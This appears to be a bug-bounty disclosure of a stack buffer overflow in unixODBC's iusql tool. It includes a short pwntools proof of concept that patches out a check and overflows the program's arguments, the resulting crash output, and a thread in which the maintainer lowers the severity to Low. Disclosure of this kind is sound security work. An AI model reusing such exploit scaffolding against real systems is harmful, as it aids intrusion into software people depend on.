classic overflow on the stack, with the ability to intercept control. in lurcher/unixodbc

Valid

Reported on

May 31st 2022


Description

if arguments longer than 1024 were passed to program iusql, we get a classic stack overflow.

Proof of Concept

I removed the docking check to reduce POC, this check did not show overflow protection

git clone https://github.com/lurcher/unixODBC.git 123
sed -i 's/^.*if ( .*phEnv, phDbc ) != SQL_SUCCESS/if(0/g' 123/exe/iusql.c
import os
os.environ['PWNLIB_NOTERM'] = '1'
os.environ['JUPYTER_DETECTED'] ='yes'
from pwn import *

a = ['A']*4
a[0] = '123/exe/iusql'
a[1] = cyclic(1024)
a[2] = cyclic(1024)
a[3] = cyclic(1024)

ex = process(argv=a)
ex.interactive()
[x] Starting local process '123/exe/iusql'
[+] Starting local process '123/exe/iusql': pid 25548
[*] Switching to interactive mode
*** buffer overflow detected ***: /content/123/exe/.libs/iusql terminated

Impact

when overflowing, control is seized, and the establishment of full control over the process

We are processing your report and will contact the lurcher/unixodbc team within 24 hours. 25 days ago
ihsinme modified the report
25 days ago
ihsinme modified the report
25 days ago
ihsinme submitted a
25 days ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 24 days ago
We have contacted a member of the lurcher/unixodbc team and are waiting to hear back 24 days ago
lurcher modified the Severity from High to Low 24 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
lurcher validated this vulnerability 24 days ago
ihsinme has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
lurcher confirmed that a fix has been merged on c6c547 24 days ago
The fix bounty has been dropped
ihsinme
24 days ago

Researcher


how can i see why the severity is lowered. in what criteria did I make a mistake. Thanks

ihsinme
19 days ago

Researcher


good afternoon. in this report the developer fixed the level to LOW. but I can't figure out what stats it lowered. in the original rating was AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H how to see the current rating vector?

Jamie Slome
19 days ago

Admin


Hello 👋 The maintainer has hard set the severity level to LOW irrespective of the vectors - i.e. they generally think that this has a low impact.

to join this conversation